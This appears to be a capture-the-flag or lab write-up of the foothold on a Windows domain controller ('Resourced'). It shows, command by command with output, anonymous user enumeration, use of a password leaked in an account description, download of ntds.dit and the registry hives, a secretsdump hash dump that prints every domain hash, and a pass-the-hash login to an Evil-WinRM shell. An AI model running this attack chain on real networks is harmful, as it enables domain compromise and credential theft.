Foothold

$ netexec smb 192.168.170.175 -u '' -p '' --users 
SMB         192.168.170.175 445    RESOURCEDC       [*] Windows 10 / Server 2019 Build 17763 x64 (name:RESOURCEDC) (domain:resourced.local) (signing:True) (SMBv1:False)
SMB         192.168.170.175 445    RESOURCEDC       [+] resourced.local\: 
SMB         192.168.170.175 445    RESOURCEDC       -Username-                    -Last PW Set-       -BadPW- -Description-                                               
SMB         192.168.170.175 445    RESOURCEDC       Administrator                 2022-02-11 17:21:20 0       Built-in account for administering the computer/domain 
SMB         192.168.170.175 445    RESOURCEDC       Guest                         <never>             0       Built-in account for guest access to the computer/domain 
SMB         192.168.170.175 445    RESOURCEDC       krbtgt                        2021-10-01 11:08:53 0       Key Distribution Center Service Account 
SMB         192.168.170.175 445    RESOURCEDC       M.Mason                       2021-10-01 11:14:51 0       Ex IT admin 
SMB         192.168.170.175 445    RESOURCEDC       K.Keen                        2021-10-01 11:14:51 0       Frontend Developer 
SMB         192.168.170.175 445    RESOURCEDC       L.Livingstone                 2021-10-01 11:14:51 0       SysAdmin 
SMB         192.168.170.175 445    RESOURCEDC       J.Johnson                     2021-10-01 11:14:52 0       Networking specialist 
SMB         192.168.170.175 445    RESOURCEDC       V.Ventz                       2021-10-01 11:14:52 0       New-hired, reminder: HotelCalifornia194! 
SMB         192.168.170.175 445    RESOURCEDC       S.Swanson                     2021-10-01 11:14:52 0       Military Vet now cybersecurity specialist 
SMB         192.168.170.175 445    RESOURCEDC       P.Parker                      2021-10-01 11:14:52 0       Backend Developer 
SMB         192.168.170.175 445    RESOURCEDC       R.Robinson                    2021-10-01 11:14:52 0       Database Admin 
SMB         192.168.170.175 445    RESOURCEDC       D.Durant                      2021-10-01 11:14:52 0       Linear Algebra and crypto god 
SMB         192.168.170.175 445    RESOURCEDC       G.Goldberg                    2021-10-01 11:14:52 0       Blockchain expert

V.Ventz:HotelCalifornia194!

$ netexec smb 192.168.170.175 -u V.Ventz -p 'HotelCalifornia194!' --shares
SMB         192.168.170.175 445    RESOURCEDC       [*] Windows 10 / Server 2019 Build 17763 x64 (name:RESOURCEDC) (domain:resourced.local) (signing:True) (SMBv1:False)
SMB         192.168.170.175 445    RESOURCEDC       [+] resourced.local\V.Ventz:HotelCalifornia194! 
SMB         192.168.170.175 445    RESOURCEDC       [*] Enumerated shares
SMB         192.168.170.175 445    RESOURCEDC       Share           Permissions     Remark
SMB         192.168.170.175 445    RESOURCEDC       -----           -----------     ------
SMB         192.168.170.175 445    RESOURCEDC       ADMIN$                          Remote Admin
SMB         192.168.170.175 445    RESOURCEDC       C$                              Default share
SMB         192.168.170.175 445    RESOURCEDC       IPC$            READ            Remote IPC
SMB         192.168.170.175 445    RESOURCEDC       NETLOGON        READ            Logon server share 
SMB         192.168.170.175 445    RESOURCEDC       Password Audit  READ            
SMB         192.168.170.175 445    RESOURCEDC       SYSVOL          READ            Logon server share

$ smbclient '\\192.168.170.175\Password Audit' -U V.Ventz%'HotelCalifornia194!'
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Tue Oct  5 03:49:16 2021
  ..                                  D        0  Tue Oct  5 03:49:16 2021
  Active Directory                    D        0  Tue Oct  5 03:49:15 2021
  registry                            D        0  Tue Oct  5 03:49:16 2021

		7706623 blocks of size 4096. 2716813 blocks available
smb: \> recurse on
smb: \> prompt off
smb: \> mget *
getting file \Active Directory\ntds.dit of size 25165824 as Active Directory/ntds.dit (1707.3 KiloBytes/sec) (average 1707.3 KiloBytes/sec)
getting file \Active Directory\ntds.jfm of size 16384 as Active Directory/ntds.jfm (88.9 KiloBytes/sec) (average 1687.3 KiloBytes/sec)
getting file \registry\SECURITY of size 65536 as registry/SECURITY (355.6 KiloBytes/sec) (average 1671.0 KiloBytes/sec)
getting file \registry\SYSTEM of size 16777216 as registry/SYSTEM (3090.2 KiloBytes/sec) (average 2046.2 KiloBytes/sec)
smb: \> exit

$ cd Active\ Directory 
                                                                                                                                                                                              
$ mv ../registry/* .

$ impacket-secretsdump -ntds ntds.dit -system SYSTEM -just-dc-ntlm local
Impacket v0.12.0.dev1+20240807.21946.829239e - Copyright 2023 Fortra

[*] Target system bootKey: 0x6f961da31c7ffaf16683f78e04c3e03d
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Searching for pekList, be patient
[*] PEK # 0 found and decrypted: 9298735ba0d788c4fc05528650553f94
[*] Reading and decrypting hashes from ntds.dit 
Administrator:500:aad3b435b51404eeaad3b435b51404ee:12579b1666d4ac10f0f59f300776495f:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
RESOURCEDC$:1000:aad3b435b51404eeaad3b435b51404ee:9ddb6f4d9d01fedeb4bccfb09df1b39d:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:3004b16f88664fbebfcb9ed272b0565b:::
M.Mason:1103:aad3b435b51404eeaad3b435b51404ee:3105e0f6af52aba8e11d19f27e487e45:::
K.Keen:1104:aad3b435b51404eeaad3b435b51404ee:204410cc5a7147cd52a04ddae6754b0c:::
L.Livingstone:1105:aad3b435b51404eeaad3b435b51404ee:19a3a7550ce8c505c2d46b5e39d6f808:::
J.Johnson:1106:aad3b435b51404eeaad3b435b51404ee:3e028552b946cc4f282b72879f63b726:::
V.Ventz:1107:aad3b435b51404eeaad3b435b51404ee:913c144caea1c0a936fd1ccb46929d3c:::
S.Swanson:1108:aad3b435b51404eeaad3b435b51404ee:bd7c11a9021d2708eda561984f3c8939:::
P.Parker:1109:aad3b435b51404eeaad3b435b51404ee:980910b8fc2e4fe9d482123301dd19fe:::
R.Robinson:1110:aad3b435b51404eeaad3b435b51404ee:fea5a148c14cf51590456b2102b29fac:::
D.Durant:1111:aad3b435b51404eeaad3b435b51404ee:08aca8ed17a9eec9fac4acdcb4652c35:::
G.Goldberg:1112:aad3b435b51404eeaad3b435b51404ee:62e16d17c3015c47b4d513e65ca757a2:::
[*] Cleaning up...

 vi hashes.txt
                                                                                                                                                                                              
$ cat hashes.txt | grep ::: | awk -F: '{print $1":"$4}'
Administrator:12579b1666d4ac10f0f59f300776495f
Guest:31d6cfe0d16ae931b73c59d7e0c089c0
RESOURCEDC$:9ddb6f4d9d01fedeb4bccfb09df1b39d
krbtgt:3004b16f88664fbebfcb9ed272b0565b
M.Mason:3105e0f6af52aba8e11d19f27e487e45
K.Keen:204410cc5a7147cd52a04ddae6754b0c
L.Livingstone:19a3a7550ce8c505c2d46b5e39d6f808
J.Johnson:3e028552b946cc4f282b72879f63b726
V.Ventz:913c144caea1c0a936fd1ccb46929d3c
S.Swanson:bd7c11a9021d2708eda561984f3c8939
P.Parker:980910b8fc2e4fe9d482123301dd19fe
R.Robinson:fea5a148c14cf51590456b2102b29fac
D.Durant:08aca8ed17a9eec9fac4acdcb4652c35
G.Goldberg:62e16d17c3015c47b4d513e65ca757a2

$ hashcat --user -m 1000 old.ntlm ~/rockyou.txt -O

Didnt crack shit lol

$ cat old.ntlm | grep : | awk -F: '{print $2}' 
12579b1666d4ac10f0f59f300776495f
31d6cfe0d16ae931b73c59d7e0c089c0
9ddb6f4d9d01fedeb4bccfb09df1b39d
3004b16f88664fbebfcb9ed272b0565b
3105e0f6af52aba8e11d19f27e487e45
204410cc5a7147cd52a04ddae6754b0c
19a3a7550ce8c505c2d46b5e39d6f808
3e028552b946cc4f282b72879f63b726
913c144caea1c0a936fd1ccb46929d3c
bd7c11a9021d2708eda561984f3c8939
980910b8fc2e4fe9d482123301dd19fe
fea5a148c14cf51590456b2102b29fac
08aca8ed17a9eec9fac4acdcb4652c35
62e16d17c3015c47b4d513e65ca757a2

$ netexec smb 192.168.170.175 -u users -H pth.ntlm --continue-on-success | grep "+"

L.Livingstone:19a3a7550ce8c505c2d46b5e39d6f808

$ netexec rdp 192.168.170.175 -u L.Livingstone -H 19a3a7550ce8c505c2d46b5e39d6f808
RDP         192.168.170.175 3389   RESOURCEDC       [*] Windows 10 or Windows Server 2016 Build 17763 (name:RESOURCEDC) (domain:resourced.local) (nla:True)
RDP         192.168.170.175 3389   RESOURCEDC       [+] resourced.local\L.Livingstone:19a3a7550ce8c505c2d46b5e39d6f808 (Pwn3d!)

$ netexec winrm 192.168.170.175 -u L.Livingstone -H 19a3a7550ce8c505c2d46b5e39d6f808
WINRM       192.168.170.175 5985   RESOURCEDC       [*] Windows 10 / Server 2019 Build 17763 (name:RESOURCEDC) (domain:resourced.local)
WINRM       192.168.170.175 5985   RESOURCEDC       [+] resourced.local\L.Livingstone:19a3a7550ce8c505c2d46b5e39d6f808 (Pwn3d!)

$ evil-winrm -u L.Livingstone -H 19a3a7550ce8c505c2d46b5e39d6f808 -i 192.168.170.175
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\L.Livingstone\Documents> whoami; type C:\Users\L.Livingstone\Desktop\local.txt; ipconfig
resourced\l.livingstone
ff1cad90deba0636ad33387726786a5f

Windows IP Configuration


Ethernet adapter Ethernet0 2:

   Connection-specific DNS Suffix  . :
   IPv4 Address. . . . . . . . . . . : 192.168.170.175
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 192.168.170.254

Previous445 NextEnumeration

Last updated 1 year ago